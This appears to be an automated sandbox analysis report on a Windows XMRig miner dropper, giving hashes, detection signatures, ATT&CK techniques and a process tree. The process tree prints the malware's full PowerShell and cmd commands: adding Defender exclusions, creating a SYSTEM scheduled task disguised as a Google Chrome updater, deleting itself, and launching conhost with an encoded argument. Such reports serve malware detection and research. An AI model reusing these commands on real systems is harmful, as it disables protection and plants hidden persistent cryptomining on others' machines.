Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    372s
  • max time network
    1797s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1252
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2740
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:1804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1960
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:1620
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1512
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:624
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2312
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2436
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {568A12DB-4FCE-42A9-896E-AD2BB40633B6} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2552
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2884
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:856

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          992KB

          MD5

          7fcabc73af0b35abf701419a3aa65c5c

          SHA1

          a46433d6586e0414bd0bbd48be56fa0de3a28bdd

          SHA256

          8511ddf95c55ddbc881f62661edb049a798c620244758c4c559d9e8f5aea7c52

          SHA512

          4cdf7d18dccafccb5f6af3d168853f5235349fb1f312d96116ac4f1cd5653b00c0c4e0840c97e880da99326a2a3da490d1906f963703d0fccd22386a6c78cb44

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.2MB

          MD5

          71a5231f5eb76497fe6fdcc1337c8c8b

          SHA1

          cd1ab0d4e332c2381653294cfc9d1720c0ada0b6

          SHA256

          68200a91ff56b154ba20fd5d9692565f6f7403739e114d10060f624ed99da756

          SHA512

          bf531d1714e9053e9031d81cdfe1d4c0fcb2f9c2e461f313f1c5397f4ef0916b83bf3d887e84a8d0dd8c8ed36df91eac83c0df3a1b719107a806708d58cd78a5

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          9101d843997c421ed4bdfd7e52582401

          SHA1

          65e96a79307ce5820195115802ba9b008d225190

          SHA256

          4d9bff851e35cd2ba7a0241f26d094f44d2a6801cd42254b83b061e71a740e9b

          SHA512

          233ab2e241cf4ba8bdbc5fb0f0452a27baf3cd450a4d0a5094ead998d120f7c2494d1b7036811a6df2c3d0194ffe089dd919eeb4b02860fb0844182c0a4f47cb

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          1.3MB

          MD5

          ead0bdf1c2d9272a9a9b64ae64f04cd0

          SHA1

          ac17632c2646df9ee23927338ebf8444e79ca2f2

          SHA256

          71c1e5c85155585f63c235956c78df4b3d1f33243d65ab83e7f4d8917d433fea

          SHA512

          b13406665b030067732089904ffaa0ce11314ac1ddc0dd5de73fc073360539a54caa3bb6dc4ae51fca843d7f208e171ac5768eab0342f54f0330d72600c43552

        • memory/868-53-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/868-54-0x0000000000A10000-0x0000000000A90000-memory.dmp
          Filesize

          512KB

        • memory/868-58-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/868-56-0x0000000000A10000-0x0000000000A90000-memory.dmp
          Filesize

          512KB

        • memory/868-57-0x0000000000A10000-0x0000000000A90000-memory.dmp
          Filesize

          512KB

        • memory/868-55-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/1960-47-0x0000000000FC0000-0x0000000001040000-memory.dmp
          Filesize

          512KB

        • memory/1960-48-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1960-49-0x0000000000FC0000-0x0000000001040000-memory.dmp
          Filesize

          512KB

        • memory/1960-50-0x0000000000FC0000-0x0000000001040000-memory.dmp
          Filesize

          512KB

        • memory/1960-51-0x0000000000FC0000-0x0000000001040000-memory.dmp
          Filesize

          512KB

        • memory/1960-52-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1960-46-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2220-28-0x000000013FE70000-0x0000000140081000-memory.dmp
          Filesize

          2.1MB

        • memory/2220-0-0x000000013FE70000-0x0000000140081000-memory.dmp
          Filesize

          2.1MB

        • memory/2284-11-0x000000000269B000-0x0000000002702000-memory.dmp
          Filesize

          412KB

        • memory/2284-8-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2284-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2284-9-0x0000000002694000-0x0000000002697000-memory.dmp
          Filesize

          12KB

        • memory/2284-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2284-6-0x0000000001F00000-0x0000000001F08000-memory.dmp
          Filesize

          32KB

        • memory/2284-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2284-5-0x000000001B2C0000-0x000000001B5A2000-memory.dmp
          Filesize

          2.9MB

        • memory/2312-70-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2312-74-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2436-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-159-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-157-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-155-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-153-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-151-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-149-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-142-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-140-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-138-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-136-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-134-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-132-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-67-0x0000000000700000-0x0000000000720000-memory.dmp
          Filesize

          128KB

        • memory/2436-66-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-68-0x0000000000790000-0x00000000007B0000-memory.dmp
          Filesize

          128KB

        • memory/2436-69-0x00000000007F0000-0x0000000000810000-memory.dmp
          Filesize

          128KB

        • memory/2436-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-78-0x0000000000790000-0x00000000007B0000-memory.dmp
          Filesize

          128KB

        • memory/2436-79-0x00000000007F0000-0x0000000000810000-memory.dmp
          Filesize

          128KB

        • memory/2436-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2436-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2564-34-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-40-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-39-0x0000000002850000-0x00000000028D0000-memory.dmp
          Filesize

          512KB

        • memory/2564-38-0x0000000002850000-0x00000000028D0000-memory.dmp
          Filesize

          512KB

        • memory/2564-37-0x0000000002850000-0x00000000028D0000-memory.dmp
          Filesize

          512KB

        • memory/2564-36-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-35-0x0000000002850000-0x00000000028D0000-memory.dmp
          Filesize

          512KB

        • memory/2776-20-0x0000000002240000-0x00000000022C0000-memory.dmp
          Filesize

          512KB

        • memory/2776-23-0x0000000002240000-0x00000000022C0000-memory.dmp
          Filesize

          512KB

        • memory/2776-25-0x0000000002240000-0x00000000022C0000-memory.dmp
          Filesize

          512KB

        • memory/2776-26-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-24-0x0000000002240000-0x00000000022C0000-memory.dmp
          Filesize

          512KB

        • memory/2776-22-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-18-0x000000001B230000-0x000000001B512000-memory.dmp
          Filesize

          2.9MB

        • memory/2776-21-0x00000000022D0000-0x00000000022D8000-memory.dmp
          Filesize

          32KB

        • memory/2776-19-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2884-44-0x000000013FE20000-0x0000000140031000-memory.dmp
          Filesize

          2.1MB

        • memory/2884-65-0x000000013FE20000-0x0000000140031000-memory.dmp
          Filesize

          2.1MB